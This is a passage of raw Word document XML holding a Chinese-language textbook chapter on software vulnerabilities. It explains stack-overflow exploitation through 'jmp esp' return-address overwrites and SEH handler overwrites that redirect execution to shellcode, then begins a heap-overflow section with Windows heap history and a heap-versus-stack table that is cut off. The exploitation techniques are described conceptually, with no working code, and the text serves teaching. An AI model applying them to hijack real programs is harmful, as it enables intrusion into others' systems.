      </w:r>
    </w:p>
    <w:p w14:paraId="607AF3FB"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11EDF448" wp14:editId="70C13483">
            <wp:extent cx="4246547" cy="3028208"/>
            <wp:effectExtent l="0" t="0" r="1905" b="127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17">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4252481" cy="3032440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EED373"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.9 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>payload被截断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5032D8D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payload被截断后，返回地址不会被覆盖为buff首地址，那么EIP也就基本没可能跳转到恶意代码处，攻击自然无法成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B67A5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如何解决这个问题呢？可以通过将返回地址覆盖为“jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>esp”指令所在地址来达到“CPU执行栈空间代码”的目的。程序中一般都会含有jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>esp指令，只要通过调试得到它的地址，就可以达到这一目的。而当函数返回时，esp一般指向返回地址的下个位置处，那么shellcode可以放到返回地址后面的内存空间中了，如下图所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787F3BB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noProof/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F0874EF" wp14:editId="427ACBAB">
            <wp:extent cx="5274310" cy="2429510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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29510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44227721"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.10 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回地址覆盖为jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>esp的地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794107E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在利用栈溢出时还可能遇到函数无法正常返回的问题，对变量的任意覆盖很有可能导致程序崩溃，跳入异常处理程序而不是返回调用者继续执行下去。此时如果还要利用返回地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>的覆盖来达到攻击目的已经是行不通的了。这时可以尝试覆盖SEH结构，这个结构中存放着一些异常处理函数的首地址，并且在栈空间，如果将异常函数地址覆盖为shellcode的首地址，那么程序出现异常并调用异常函数时会进入到shellcode执行恶意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED802E0"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noProof/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BE42699" wp14:editId="7AA9C6B8">
            <wp:extent cx="4595928" cy="2713512"/>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0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4607730" cy="2720480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF337CC"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 xml:space="preserve">.11 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SEH覆盖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B06094" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4975F4F1" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="000012A0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆溢出漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D429FF6"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 xml:space="preserve">.3.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>堆简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFF751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堆（Heap）是程序运行时向操作系统申请的，存放运行时数据的内存段。与栈不同，堆的大小并不固定，可由程序动态扩张或缩减，由于操作系统采用动态链表管理堆，所以堆内存不一定连续。每个进程都有自己的堆，堆可以提供一个进程生命周期存放的数据的区域，对于一个进程的堆，有默认堆和私有堆两种，默认堆是进程初始化时，操作系统在进程地址空间中创建的，默认情况下大小为1MB，私有堆是程序自己创建和维护的，用于保存程序运行时的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563C9DB8" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E7B80EB"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1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Windows堆的历史</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130DB8D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由于微软没有完全公开Windows中堆管理的细节，目前为止，人们对Windows堆的了解主要基于技术狂热者、黑客、安全专家、逆向工程师等的个人研究成果，经过前人的大量工作，目前Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NT4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/2000 sp4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的堆管理策略已经“基本”研究清楚。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107931E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lastRenderedPageBreak/>
        <w:t>现有的研究已经能解释Windows堆管理与攻击相关的数据结构和算法，在众多关于Windows堆的研究中，以下即为的研究格外具有代表性：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147B3E7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（1）Halvar</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flake</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：在2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>002</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>年的black</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hat上，他在演讲“Third</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Generation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Exploitation”中首次挑战Windows的堆溢出，并揭秘了堆中一些重要的数据结构和算法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5716FCE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（2）David Litchfield：David应该是安全技术界的传奇人物。除了他曾经发现的那些被横扫世界的蠕虫所利用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>day漏洞外，他还是著名的安全咨询公司NGS(Next Generation Security)的创始人。David在2004年black hat上演讲的“Windows Heap Overflows”首次比较全面地介绍了Windows 2000平台下堆溢出的技术细节，包括了重要数据结构、堆分配算法、利用思路、劫持进程的方法、执行Shellcode时会遇到的问题等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F19FF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（3）Matt Conover：其演讲的“XP SP2 Heap Exploitation”中除了全面揭示了Windows堆中与溢出相关的所有数据结构和分配策略之外，最重要的是，他还提出了突破Windows XP SP2平台下应对更为复杂安全机制的防护进行堆溢出的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B934D8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现代操作系统在经过了若干年的演变后，目前使用的堆管理机制兼顾了内存有效利用、分配决策速度、健壮性、安全性等因素，这使得堆管理变得异常复杂。随着操作系统的更新，堆结构及管理机制均有较大的变化，Windows系统堆管理机制的发展大致可以分为三个阶段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D11283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（1）Windows 2000~Windows XP SP1：堆管理系统只考虑了完成分配任务和性能因素，丝毫没有考虑安全因素，可以比较容易发被攻击者利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7641154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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）Windows XP 2~Windows 2003：加入了安全因素，比如修改了块首的格式并加入安全Cookie，双向链表结点在删除时会做指针验证等。这些安全防护措施使堆溢出攻击变得非常困难，但利用一些高级的攻击技术在一定情况下还是有可能利用成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DB422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（3）Windows Vista~Windows 7：不论在堆分配效率上还是安全与稳定性上，都是堆管理算法的一个里程碑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B86A778" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D36861"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>堆与栈的区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34583D8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经过对栈溢出利用的学习，我们应该明白栈空间是在程序设计时已经规定好怎么使用，使用多少内存空间的。典型的栈变量包括函数内部的普通变量、数组等。栈变量在使用的时候不需要额外的申请操作，系统栈会根据函数中的变量声明自动在函数栈帧中给其预留空间。栈空间由系统维护，它的分配(如sub</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>esp , xx)和回收(如add esp,xxx)都由系统来完成，最终达到栈平衡，所有的这些对程序员来说都是透明的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383C902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堆的结构和操作与栈有较大不同，堆具备以下特性：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0671E4A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lastRenderedPageBreak/>
        <w:t>（1）堆是一种在程序运行时动态分配的内存。所谓动态是指所需内存的大小在程序设计时不能预先决定，需要在程序运行时参考用户的反馈。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5EC4D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堆在使用时需要程序员用专用函数进行申请，如C语言中的malloc等函数、C++中的new函数等都是最常见的分配堆内存的函数。堆内存申请有可能成功，也有可能失败，这与申请内存的大小、机器性能和当前运行环境有关。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B37AC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（3）一般用一个堆指针来使用申请得到的内存，读、写、释放都通过这个指针来完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007AD18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（4）使用完毕后需要把堆指针传给堆释放函数回收这片内存，否则会造成内存泄露。典型的释放函数包括free、delete等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C4233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栈只有pop和push两种操作，总是在“线性”变化，其管理机制也相对简单，所以，栈溢出的利用很容易掌握。与“整齐”的栈不同，堆往往显得“杂乱无章”，所以堆溢出的利用是内存利用技术的一个转折点，堆和栈的区别如表</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398718A1" w14:textId="7777777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表</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>堆内存与栈内存的比较</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1413"/>
        <w:gridCol w:w="3260"/>
        <w:gridCol w:w="3623"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="09199EF9" w14:textId="77777777" w:rsidTr="00621588">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EC8B36D" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:leftChars="17" w:left="36" w:firstLineChars="200" w:firstLine="422"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44981C49" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:leftChars="17" w:left="36" w:firstLineChars="200" w:firstLine="422"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>堆内存</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3623" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A82057F" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:leftChars="17" w:left="36" w:firstLineChars="200" w:firstLine="422"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>栈内存</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="47D16347" w14:textId="77777777" w:rsidTr="00621588">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36F47506" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:leftChars="17" w:left="36" w:firstLineChars="200" w:firstLine="361"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>典型用例</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B3A345B"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动态增长的链表等数据结构</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3623" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62F76458"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函数局部数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="6C3D97A1" w14:textId="77777777" w:rsidTr="00621588">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46DA766E" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:leftChars="17" w:left="36" w:firstLineChars="200" w:firstLine="361"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>申请方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45FE396B"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需要用函数申请，通过返回的指针使用，如p</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>=malloc(8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3623" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44EDA772"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在程序中直接声明即可，如c</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>har buf[8]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="4E985CBD" w14:textId="77777777" w:rsidTr="00621588">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11EEE5D1" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:leftChars="17" w:left="36" w:firstLineChars="200" w:firstLine="361"/>
              <w:rPr>
